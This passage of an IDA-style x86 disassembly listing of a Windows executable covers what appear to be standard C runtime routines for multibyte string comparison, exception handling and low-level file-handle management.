		call	sub_40ED5A
		add	esp, 0Ch
		retn
sub_40EF74	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40EF87	proc near		; CODE XREF: sub_40F0F0+Ep

var_10		= byte ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		xor	ebx, ebx
		cmp	[ebp+arg_8], ebx
		jnz	short loc_40EF9C
		xor	eax, eax
		jmp	loc_40F0D9
; ---------------------------------------------------------------------------

loc_40EF9C:				; CODE XREF: sub_40EF87+Cj
		push	edi
		push	[ebp+arg_C]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		mov	edi, [ebp+var_C]
		cmp	[edi+8], ebx
		jnz	short loc_40EFD6
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_40CEB9
		add	esp, 0Ch
		cmp	[ebp+var_4], bl
		jz	loc_40F0D8
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	loc_40F0D8
; ---------------------------------------------------------------------------

loc_40EFD6:				; CODE XREF: sub_40EF87+27j
		cmp	[ebp+arg_0], ebx
		jnz	short loc_40F009
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_40EFFF
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40EFFF:				; CODE XREF: sub_40EF87+6Fj
		mov	eax, 7FFFFFFFh
		jmp	loc_40F0D8
; ---------------------------------------------------------------------------

loc_40F009:				; CODE XREF: sub_40EF87+52j
		push	esi
		mov	esi, [ebp+arg_4]
		cmp	esi, ebx
		jnz	short loc_40F03F
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_40F035
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40F035:				; CODE XREF: sub_40EF87+A5j
		mov	eax, 7FFFFFFFh
		jmp	loc_40F0D7
; ---------------------------------------------------------------------------

loc_40F03F:				; CODE XREF: sub_40EF87+88j
					; sub_40EF87+13Cj
		mov	eax, [ebp+arg_0]
		movzx	cx, byte ptr [eax]
		dec	[ebp+arg_8]
		movzx	ecx, cx
		movzx	edx, cl
		inc	eax
		test	byte ptr [edx+edi+1Dh],	4
		mov	[ebp+arg_0], eax
		jz	short loc_40F086
		cmp	[ebp+arg_8], ebx
		jnz	short loc_40F070
		movzx	eax, byte ptr [esi]
		xor	ecx, ecx
		test	byte ptr [eax+edi+1Dh],	4
		jnz	short loc_40F0C9
		movzx	eax, ax
		jmp	short loc_40F0B6
; ---------------------------------------------------------------------------

loc_40F070:				; CODE XREF: sub_40EF87+D6j
		mov	al, [eax]
		cmp	al, bl
		jnz	short loc_40F07A
		xor	ecx, ecx
		jmp	short loc_40F086
; ---------------------------------------------------------------------------

loc_40F07A:				; CODE XREF: sub_40EF87+EDj
		xor	edx, edx
		inc	[ebp+arg_0]
		mov	dh, cl
		mov	dl, al
		movzx	ecx, dx

loc_40F086:				; CODE XREF: sub_40EF87+D1j
					; sub_40EF87+F1j
		movzx	ax, byte ptr [esi]
		movzx	eax, ax
		movzx	edx, al
		inc	esi
		test	byte ptr [edx+edi+1Dh],	4
		jz	short loc_40F0B6
		cmp	[ebp+arg_8], ebx
		jnz	short loc_40F0A1

loc_40F09D:				; CODE XREF: sub_40EF87+121j
		xor	eax, eax
		jmp	short loc_40F0B6
; ---------------------------------------------------------------------------

loc_40F0A1:				; CODE XREF: sub_40EF87+114j
		mov	dl, [esi]
		dec	[ebp+arg_8]
		cmp	dl, bl
		jz	short loc_40F09D
		xor	ebx, ebx
		mov	bh, al
		inc	esi
		mov	bl, dl
		movzx	eax, bx
		xor	ebx, ebx

loc_40F0B6:				; CODE XREF: sub_40EF87+E7j
					; sub_40EF87+10Fj ...
		cmp	ax, cx
		jnz	short loc_40F0DC
		cmp	cx, bx
		jz	short loc_40F0C9
		cmp	[ebp+arg_8], ebx
		jnz	loc_40F03F

loc_40F0C9:				; CODE XREF: sub_40EF87+E2j
					; sub_40EF87+137j
		cmp	[ebp+var_4], bl
		jz	short loc_40F0D5
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40F0D5:				; CODE XREF: sub_40EF87+145j
		xor	eax, eax

loc_40F0D7:				; CODE XREF: sub_40EF87+B3j
					; sub_40EF87+15Ej ...
		pop	esi

loc_40F0D8:				; CODE XREF: sub_40EF87+3Dj
					; sub_40EF87+4Aj ...
		pop	edi

loc_40F0D9:				; CODE XREF: sub_40EF87+10j
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_40F0DC:				; CODE XREF: sub_40EF87+132j
		sbb	eax, eax
		and	eax, 2
		dec	eax
		cmp	[ebp+var_4], bl
		jz	short loc_40F0D7
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	short loc_40F0D7
sub_40EF87	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F0F0	proc near		; CODE XREF: sub_4087BF+1D1p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	0
		push	[esp+4+arg_8]
		push	[esp+8+arg_4]
		push	[esp+0Ch+arg_0]
		call	sub_40EF87
		add	esp, 10h
		retn
sub_40F0F0	endp

; ---------------------------------------------------------------------------
		align 4
		push	ebp
		mov	ebp, esp
		push	ebx
		push	esi
		push	edi
		push	ebp
		push	0
		push	0
		push	offset loc_40F120
		push	dword ptr [ebp+8]
		call	sub_413F36

loc_40F120:				; DATA XREF: .text:0040F113o
		pop	ebp
		pop	edi
		pop	esi
		pop	ebx
		mov	esp, ebp
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_40F128:				; DATA XREF: sub_40F16D+Bo
					; .text:0040F1FAo
		mov	ecx, [esp+4]
		test	dword ptr [ecx+4], 6
		mov	eax, 1
		jz	short locret_40F16C
		mov	eax, [esp+14h]
		mov	ecx, [eax-4]
		xor	ecx, eax
		call	sub_402C9E
		push	ebp
		mov	ebp, [eax+10h]
		mov	edx, [eax+28h]
		push	edx
		mov	edx, [eax+24h]
		push	edx
		call	sub_40F16D
		add	esp, 8
		pop	ebp
		mov	eax, [esp+8]
		mov	edx, [esp+10h]
		mov	[edx], eax
		mov	eax, 3

locret_40F16C:				; CODE XREF: .text:0040F138j
		retn

; =============== S U B	R O U T	I N E =======================================



sub_40F16D	proc near		; CODE XREF: .text:0040F154p

var_20		= dword	ptr -20h
var_18		= dword	ptr -18h
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	ebx
		push	esi
		push	edi
		mov	eax, [esp+0Ch+arg_0]
		push	ebp
		push	eax
		push	0FFFFFFFEh
		push	offset loc_40F128
		push	large dword ptr	fs:0
		mov	eax, dword_424064
		xor	eax, esp
		push	eax
		lea	eax, [esp+24h+var_20]
		mov	large fs:0, eax

loc_40F196:				; CODE XREF: sub_40F16D:loc_40F1DDj
		mov	eax, [esp+24h+arg_0]
		mov	ebx, [eax+8]
		mov	esi, [eax+0Ch]
		cmp	esi, 0FFFFFFFFh
		jz	short loc_40F1DF
		cmp	[esp+24h+arg_4], 0FFFFFFFFh
		jz	short loc_40F1B2
		cmp	esi, [esp+24h+arg_4]
		jbe	short loc_40F1DF

loc_40F1B2:				; CODE XREF: sub_40F16D+3Dj
		lea	esi, [esi+esi*2]
		mov	ecx, [ebx+esi*4]
		mov	[esp+24h+var_18], ecx
		mov	[eax+0Ch], ecx
		cmp	dword ptr [ebx+esi*4+4], 0
		jnz	short loc_40F1DD
		push	101h
		mov	eax, [ebx+esi*4+8]
		call	sub_40F21D
		mov	eax, [ebx+esi*4+8]
		call	sub_40F23C

loc_40F1DD:				; CODE XREF: sub_40F16D+57j
		jmp	short loc_40F196
; ---------------------------------------------------------------------------

loc_40F1DF:				; CODE XREF: sub_40F16D+36j
					; sub_40F16D+43j
		mov	ecx, [esp+24h+var_20]
		mov	large fs:0, ecx
		add	esp, 18h
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_40F16D	endp

; ---------------------------------------------------------------------------
		xor	eax, eax
		mov	ecx, large fs:0
		cmp	dword ptr [ecx+4], offset loc_40F128
		jnz	short locret_40F213
		mov	edx, [ecx+0Ch]
		mov	edx, [edx+0Ch]
		cmp	[ecx+8], edx
		jnz	short locret_40F213
		mov	eax, 1

locret_40F213:				; CODE XREF: .text:0040F201j
					; .text:0040F20Cj
		retn

; =============== S U B	R O U T	I N E =======================================



sub_40F214	proc near		; CODE XREF: sub_40C4B0+1Ep
					; sub_40C4B0+40p
		push	ebx
		push	ecx
		mov	ebx, offset dword_424FB0
		jmp	short loc_40F228
sub_40F214	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F21D	proc near		; CODE XREF: sub_408B88+6Ep
					; sub_406C00+2099p ...

arg_0		= dword	ptr  4

		push	ebx
		push	ecx
		mov	ebx, offset dword_424FB0
		mov	ecx, [esp+8+arg_0]

loc_40F228:				; CODE XREF: sub_40F214+7j
		mov	[ebx+8], ecx
		mov	[ebx+4], eax
		mov	[ebx+0Ch], ebp
		push	ebp
		push	ecx
		push	eax
		pop	eax
		pop	ecx
		pop	ebp
		pop	ecx
		pop	ebx
		retn	4
sub_40F21D	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F23C	proc near		; CODE XREF: sub_408B88+7Bp
					; sub_40F16D+6Bp
		call	eax
		retn
sub_40F23C	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F23F	proc near		; CODE XREF: sub_40E632+2BBp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	eax, [esp+arg_0]
		test	eax, eax
		push	esi
		push	edi
		jl	short loc_40F2A3
		cmp	eax, dword_4376E4
		jnb	short loc_40F2A3
		mov	esi, eax
		and	esi, 1Fh
		imul	esi, 28h
		mov	ecx, eax
		sar	ecx, 5
		lea	edi, ds:437700h[ecx*4]
		mov	ecx, [edi]
		cmp	dword ptr [esi+ecx], 0FFFFFFFFh
		jnz	short loc_40F2A3
		cmp	dword_424050, 1
		push	ebx
		mov	ebx, [esp+0Ch+arg_4]
		jnz	short loc_40F299
		sub	eax, 0
		jz	short loc_40F290
		dec	eax
		jz	short loc_40F28B
		dec	eax
		jnz	short loc_40F299
		push	ebx
		push	0FFFFFFF4h
		jmp	short loc_40F293
; ---------------------------------------------------------------------------

loc_40F28B:				; CODE XREF: sub_40F23F+42j
		push	ebx
		push	0FFFFFFF5h
		jmp	short loc_40F293
; ---------------------------------------------------------------------------

loc_40F290:				; CODE XREF: sub_40F23F+3Fj
		push	ebx
		push	0FFFFFFF6h

loc_40F293:				; CODE XREF: sub_40F23F+4Aj
					; sub_40F23F+4Fj
		call	ds:off_41E0B8

loc_40F299:				; CODE XREF: sub_40F23F+3Aj
					; sub_40F23F+45j
		mov	eax, [edi]
		mov	[esi+eax], ebx
		xor	eax, eax
		pop	ebx
		jmp	short loc_40F2B9
; ---------------------------------------------------------------------------

loc_40F2A3:				; CODE XREF: sub_40F23F+8j
					; sub_40F23F+10j ...
		call	sub_405D93
		mov	dword ptr [eax], 9
		call	sub_405DA6
		and	dword ptr [eax], 0
		or	eax, 0FFFFFFFFh

loc_40F2B9:				; CODE XREF: sub_40F23F+62j
		pop	edi
		pop	esi
		retn
sub_40F23F	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F2BC	proc near		; CODE XREF: sub_40900D+62p

arg_0		= dword	ptr  4

		mov	ecx, [esp+arg_0]
		push	ebx
		xor	ebx, ebx
		cmp	ecx, ebx
		push	esi
		push	edi
		jl	short loc_40F324
		cmp	ecx, dword_4376E4
		jnb	short loc_40F324
		mov	esi, ecx
		and	esi, 1Fh
		imul	esi, 28h
		mov	eax, ecx
		sar	eax, 5
		lea	edi, ds:437700h[eax*4]
		mov	eax, [edi]
		add	eax, esi
		test	byte ptr [eax+4], 1
		jz	short loc_40F324
		cmp	dword ptr [eax], 0FFFFFFFFh
		jz	short loc_40F324
		cmp	dword_424050, 1
		jnz	short loc_40F31A
		sub	ecx, ebx
		jz	short loc_40F311
		dec	ecx
		jz	short loc_40F30C
		dec	ecx
		jnz	short loc_40F31A
		push	ebx
		push	0FFFFFFF4h
		jmp	short loc_40F314
; ---------------------------------------------------------------------------

loc_40F30C:				; CODE XREF: sub_40F2BC+46j
		push	ebx
		push	0FFFFFFF5h
		jmp	short loc_40F314
; ---------------------------------------------------------------------------

loc_40F311:				; CODE XREF: sub_40F2BC+43j
		push	ebx
		push	0FFFFFFF6h

loc_40F314:				; CODE XREF: sub_40F2BC+4Ej
					; sub_40F2BC+53j
		call	ds:off_41E0B8

loc_40F31A:				; CODE XREF: sub_40F2BC+3Fj
					; sub_40F2BC+49j
		mov	eax, [edi]
		or	dword ptr [esi+eax], 0FFFFFFFFh
		xor	eax, eax
		jmp	short loc_40F339
; ---------------------------------------------------------------------------

loc_40F324:				; CODE XREF: sub_40F2BC+Bj
					; sub_40F2BC+13j ...
		call	sub_405D93
		mov	dword ptr [eax], 9
		call	sub_405DA6
		mov	[eax], ebx
		or	eax, 0FFFFFFFFh

loc_40F339:				; CODE XREF: sub_40F2BC+66j
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_40F2BC	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F33D	proc near		; CODE XREF: sub_40900D+7p
					; sub_40900D+2Fp ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_40F35D
		call	sub_405DA6
		and	dword ptr [eax], 0
		call	sub_405D93
		mov	dword ptr [eax], 9
		or	eax, 0FFFFFFFFh
		retn
; ---------------------------------------------------------------------------

loc_40F35D:				; CODE XREF: sub_40F33D+7j
		push	esi
		xor	esi, esi
		cmp	eax, esi
		jl	short loc_40F386
		cmp	eax, dword_4376E4
		jnb	short loc_40F386
		mov	ecx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	ecx, 5
		mov	ecx, dword_437700[ecx*4]
		add	eax, ecx
		test	byte ptr [eax+4], 1
		jnz	short loc_40F3AA

loc_40F386:				; CODE XREF: sub_40F33D+25j
					; sub_40F33D+2Dj
		call	sub_405DA6
		mov	[eax], esi
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 9
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40F3AA:				; CODE XREF: sub_40F33D+47j
		mov	eax, [eax]
		pop	esi
		retn
sub_40F33D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F3AE	proc near		; CODE XREF: sub_4090A1+7Fp
					; sub_40A90F+7Fp ...

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	0Ch
		push	offset dword_422DF0
		call	__SEH_prolog4
		mov	edi, [ebp+arg_0]
		mov	eax, edi
		sar	eax, 5
		mov	esi, edi
		and	esi, 1Fh
		imul	esi, 28h
		add	esi, dword_437700[eax*4]
		mov	[ebp+var_1C], 1
		xor	ebx, ebx
		cmp	[esi+8], ebx
		jnz	short loc_40F415
		push	0Ah
		call	sub_405FB7
		pop	ecx
		mov	[ebp+ms_exc.disabled], ebx
		cmp	[esi+8], ebx
		jnz	short loc_40F409
		push	0FA0h
		lea	eax, [esi+0Ch]
		push	eax
		call	sub_40D0D4
		pop	ecx
		pop	ecx
		test	eax, eax
		jnz	short loc_40F406
		mov	[ebp+var_1C], ebx

loc_40F406:				; CODE XREF: sub_40F3AE+53j
		inc	dword ptr [esi+8]

loc_40F409:				; CODE XREF: sub_40F3AE+3Fj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40F445

loc_40F415:				; CODE XREF: sub_40F3AE+2Fj
		cmp	[ebp+var_1C], ebx
		jz	short loc_40F437
		mov	eax, edi
		sar	eax, 5
		and	edi, 1Fh
		imul	edi, 28h
		mov	eax, dword_437700[eax*4]
		lea	eax, [eax+edi+0Ch]
		push	eax
		call	ds:dword_41E164	; RtlEnterCriticalSection

loc_40F437:				; CODE XREF: sub_40F3AE+6Aj
		mov	eax, [ebp+var_1C]
		call	__SEH_epilog4
		retn
sub_40F3AE	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F440	proc near		; DATA XREF: jlrllt49:00422E08o
		xor	ebx, ebx
		mov	edi, [ebp+8]
sub_40F440	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40F445	proc near		; CODE XREF: sub_40F3AE+62p
		push	0Ah
		call	sub_405EDF
		pop	ecx
		retn
sub_40F445	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F44E	proc near		; CODE XREF: sub_409164+3p
					; sub_40A9E1+3p ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	ecx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	ecx, 5
		mov	ecx, dword_437700[ecx*4]
		lea	eax, [ecx+eax+0Ch]
		push	eax
		call	ds:dword_41E168	; RtlLeaveCriticalSection
		retn
sub_40F44E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F470	proc near		; CODE XREF: sub_40E632:loc_40E828p

var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

; FUNCTION CHUNK AT 0040F54C SIZE 000000BA BYTES

		push	18h
		push	offset dword_422E10
		call	__SEH_prolog4
		or	[ebp+var_1C], 0FFFFFFFFh
		xor	edi, edi
		mov	[ebp+var_24], edi
		push	0Bh
		call	sub_405EF4
		pop	ecx
		test	eax, eax
		jnz	short loc_40F499
		or	eax, 0FFFFFFFFh
		jmp	loc_40F600
; ---------------------------------------------------------------------------

loc_40F499:				; CODE XREF: sub_40F470+1Fj
		push	0Bh
		call	sub_405FB7
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi

loc_40F4A4:				; CODE XREF: sub_40F470+109j
		mov	[ebp+var_28], edi
		cmp	edi, 40h
		jge	loc_40F5F1
		mov	esi, dword_437700[edi*4]
		test	esi, esi
		jz	loc_40F57E

loc_40F4BF:				; CODE XREF: sub_40F470+CBj
		mov	[ebp+var_20], esi
		mov	eax, dword_437700[edi*4]
		add	eax, 500h
		cmp	esi, eax
		jnb	loc_40F572
		test	byte ptr [esi+4], 1
		jnz	short loc_40F538
		cmp	dword ptr [esi+8], 0
		jnz	short loc_40F51B
		push	0Ah
		call	sub_405FB7
		pop	ecx
		xor	ebx, ebx
		inc	ebx
		mov	[ebp+ms_exc.disabled], ebx
		cmp	dword ptr [esi+8], 0
		jnz	short loc_40F512
		push	0FA0h
		lea	eax, [esi+0Ch]
		push	eax
		call	sub_40D0D4
		pop	ecx
		pop	ecx
		test	eax, eax
		jnz	short loc_40F50F
		mov	[ebp+var_24], ebx
		jmp	short loc_40F512
; ---------------------------------------------------------------------------

loc_40F50F:				; CODE XREF: sub_40F470+98j
		inc	dword ptr [esi+8]

loc_40F512:				; CODE XREF: sub_40F470+84j
					; sub_40F470+9Dj
		and	[ebp+ms_exc.disabled], 0
		call	sub_40F543

loc_40F51B:				; CODE XREF: sub_40F470+70j
		cmp	[ebp+var_24], 0
		jnz	short loc_40F538
		lea	ebx, [esi+0Ch]
		push	ebx
		call	ds:dword_41E164	; RtlEnterCriticalSection
		test	byte ptr [esi+4], 1
		jz	short loc_40F54C
		push	ebx
		call	ds:dword_41E168	; RtlLeaveCriticalSection

loc_40F538:				; CODE XREF: sub_40F470+6Aj
					; sub_40F470+AFj ...
		add	esi, 28h
		jmp	short loc_40F4BF
sub_40F470	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F53D	proc near		; DATA XREF: jlrllt49:00422E34o
		mov	edi, [ebp-28h]
		mov	esi, [ebp-20h]
sub_40F53D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40F543	proc near		; CODE XREF: sub_40F470+A6p
		push	0Ah
		call	sub_405EDF
		pop	ecx
		retn
sub_40F543	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_40F470

loc_40F54C:				; CODE XREF: sub_40F470+BFj
		cmp	[ebp+var_24], 0
		jnz	short loc_40F538
		mov	byte ptr [esi+4], 1
		or	dword ptr [esi], 0FFFFFFFFh
		mov	eax, esi
		sub	eax, dword_437700[edi*4]
		cdq
		push	28h
		pop	ecx
		idiv	ecx
		mov	ecx, edi
		shl	ecx, 5
		add	eax, ecx
		mov	[ebp+var_1C], eax

loc_40F572:				; CODE XREF: sub_40F470+60j
		cmp	[ebp+var_1C], 0FFFFFFFFh
		jnz	short loc_40F5F1
		inc	edi
		jmp	loc_40F4A4
; ---------------------------------------------------------------------------

loc_40F57E:				; CODE XREF: sub_40F470+49j
		push	28h
		push	20h
		call	sub_407D3A
		pop	ecx
		pop	ecx
		mov	[ebp+var_20], eax
		test	eax, eax
		jz	short loc_40F5F1
		lea	ecx, ds:437700h[edi*4]
		mov	[ecx], eax
		add	dword_4376E4, 20h

loc_40F5A0:				; CODE XREF: sub_40F470+151j
		mov	edx, [ecx]
		add	edx, 500h
		cmp	eax, edx
		jnb	short loc_40F5C3
		mov	byte ptr [eax+4], 0
		or	dword ptr [eax], 0FFFFFFFFh
		mov	byte ptr [eax+5], 0Ah
		and	dword ptr [eax+8], 0
		add	eax, 28h
		mov	[ebp+var_20], eax
		jmp	short loc_40F5A0
; ---------------------------------------------------------------------------

loc_40F5C3:				; CODE XREF: sub_40F470+13Aj
		shl	edi, 5
		mov	[ebp+var_1C], edi
		mov	eax, edi
		sar	eax, 5
		mov	ecx, edi
		and	ecx, 1Fh
		imul	ecx, 28h
		mov	eax, dword_437700[eax*4]
		mov	byte ptr [eax+ecx+4], 1
		push	edi
		call	sub_40F3AE
		pop	ecx
		test	eax, eax
		jnz	short loc_40F5F1
		or	[ebp+var_1C], 0FFFFFFFFh

loc_40F5F1:				; CODE XREF: sub_40F470+3Aj
					; sub_40F470+106j ...
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40F606
		mov	eax, [ebp+var_1C]

loc_40F600:				; CODE XREF: sub_40F470+24j
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_40F470

; =============== S U B	R O U T	I N E =======================================



sub_40F606	proc near		; CODE XREF: sub_40F470+188p
					; DATA XREF: jlrllt49:00422E28o
		push	0Bh
		call	sub_405EDF
		pop	ecx
		retn
sub_40F606	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F60F	proc near		; CODE XREF: sub_4091FC+31p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	10h
		push	offset dword_422E38
		call	__SEH_prolog4
		mov	eax, [ebp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_40F636
		call	sub_405D93
		mov	dword ptr [eax], 9

loc_40F62E:				; CODE XREF: sub_40F60F+4Dj
		or	eax, 0FFFFFFFFh
		jmp	loc_40F6E0
; ---------------------------------------------------------------------------

loc_40F636:				; CODE XREF: sub_40F60F+12j
		xor	ebx, ebx
		cmp	eax, ebx
		jl	short loc_40F644
		cmp	eax, dword_4376E4
		jb	short loc_40F65E

loc_40F644:				; CODE XREF: sub_40F60F+2Bj
					; sub_40F60F+6Dj
		call	sub_405D93
		mov	dword ptr [eax], 9
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4034C7
		add	esp, 14h
		jmp	short loc_40F62E
; ---------------------------------------------------------------------------

loc_40F65E:				; CODE XREF: sub_40F60F+33j
		mov	ecx, eax
		sar	ecx, 5
		lea	edi, ds:437700h[ecx*4]
		mov	esi, eax
		and	esi, 1Fh
		imul	esi, 28h
		mov	ecx, [edi]
		movzx	ecx, byte ptr [esi+ecx+4]
		and	ecx, 1
		jz	short loc_40F644
		push	eax
		call	sub_40F3AE
		pop	ecx
		mov	[ebp+ms_exc.disabled], ebx
		mov	eax, [edi]
		test	byte ptr [esi+eax+4], 1
		jz	short loc_40F6C2
		push	[ebp+arg_0]
		call	sub_40F33D
		pop	ecx
		push	eax
		call	ds:off_41E0B4
		test	eax, eax
		jnz	short loc_40F6B0
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		mov	[ebp+var_1C], eax
		jmp	short loc_40F6B3
; ---------------------------------------------------------------------------

loc_40F6B0:				; CODE XREF: sub_40F60F+94j
		mov	[ebp+var_1C], ebx

loc_40F6B3:				; CODE XREF: sub_40F60F+9Fj
		cmp	[ebp+var_1C], ebx
		jz	short loc_40F6D1
		call	sub_405DA6
		mov	ecx, [ebp+var_1C]
		mov	[eax], ecx

loc_40F6C2:				; CODE XREF: sub_40F60F+80j
		call	sub_405D93
		mov	dword ptr [eax], 9
		or	[ebp+var_1C], 0FFFFFFFFh

loc_40F6D1:				; CODE XREF: sub_40F60F+A7j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40F6E6
		mov	eax, [ebp+var_1C]

loc_40F6E0:				; CODE XREF: sub_40F60F+22j
		call	__SEH_epilog4
		retn
sub_40F60F	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F6E6	proc near		; CODE XREF: sub_40F60F+C9p
					; DATA XREF: jlrllt49:00422E50o
		push	dword ptr [ebp+8]
		call	sub_40F44E
		pop	ecx
		retn
sub_40F6E6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F6F0	proc near		; CODE XREF: sub_40F73F+21p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		mov	eax, [ebp+var_10]
		cmp	dword ptr [eax+0ACh], 1
		jle	short loc_40F720
		lea	eax, [ebp+var_10]
		push	eax
		push	4
		push	[ebp+arg_0]
		call	sub_40D004
		add	esp, 0Ch
		jmp	short loc_40F730
; ---------------------------------------------------------------------------

loc_40F720:				; CODE XREF: sub_40F6F0+1Bj
		mov	eax, [eax+0C8h]
		mov	ecx, [ebp+arg_0]
		movzx	eax, byte ptr [eax+ecx*2]
		and	eax, 4

loc_40F730:				; CODE XREF: sub_40F6F0+2Ej
		cmp	[ebp+var_4], 0
		jz	short locret_40F73D
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_40F73D:				; CODE XREF: sub_40F6F0+44j
		leave
		retn
sub_40F6F0	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F73F	proc near		; CODE XREF: sub_409427+1B6p
					; sub_409427+3EFp ...

arg_0		= dword	ptr  4

		cmp	dword_428140, 0
		jnz	short loc_40F75A
		mov	eax, [esp+arg_0]
		mov	ecx, off_424668
		movzx	eax, byte ptr [ecx+eax*2]
		and	eax, 4
		retn
; ---------------------------------------------------------------------------

loc_40F75A:				; CODE XREF: sub_40F73F+7j
		push	0
		push	[esp+4+arg_0]
		call	sub_40F6F0
		pop	ecx
		pop	ecx
		retn
sub_40F73F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F768	proc near		; CODE XREF: sub_40F7BC+23p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		mov	eax, [ebp+var_10]
		cmp	dword ptr [eax+0ACh], 1
		jle	short loc_40F79B
		lea	eax, [ebp+var_10]
		push	eax
		push	80h
		push	[ebp+arg_0]
		call	sub_40D004
		add	esp, 0Ch
		jmp	short loc_40F7AD
; ---------------------------------------------------------------------------

loc_40F79B:				; CODE XREF: sub_40F768+1Bj
		mov	eax, [eax+0C8h]
		mov	ecx, [ebp+arg_0]
		movzx	eax, byte ptr [eax+ecx*2]
		and	eax, 80h

loc_40F7AD:				; CODE XREF: sub_40F768+31j
		cmp	[ebp+var_4], 0
		jz	short locret_40F7BA
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_40F7BA:				; CODE XREF: sub_40F768+49j
		leave
		retn
sub_40F768	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F7BC	proc near		; CODE XREF: sub_409427+9DFp
					; sub_409427+AB7p

arg_0		= dword	ptr  4

		cmp	dword_428140, 0
		jnz	short loc_40F7D9
		mov	eax, [esp+arg_0]
		mov	ecx, off_424668
		movzx	eax, byte ptr [ecx+eax*2]
		and	eax, 80h
		retn
; ---------------------------------------------------------------------------

loc_40F7D9:				; CODE XREF: sub_40F7BC+7j
		push	0
		push	[esp+4+arg_0]
		call	sub_40F768
		pop	ecx
		pop	ecx
		retn
sub_40F7BC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F7E7	proc near		; CODE XREF: sub_40F836+21p

var_10		= dword	ptr -10h
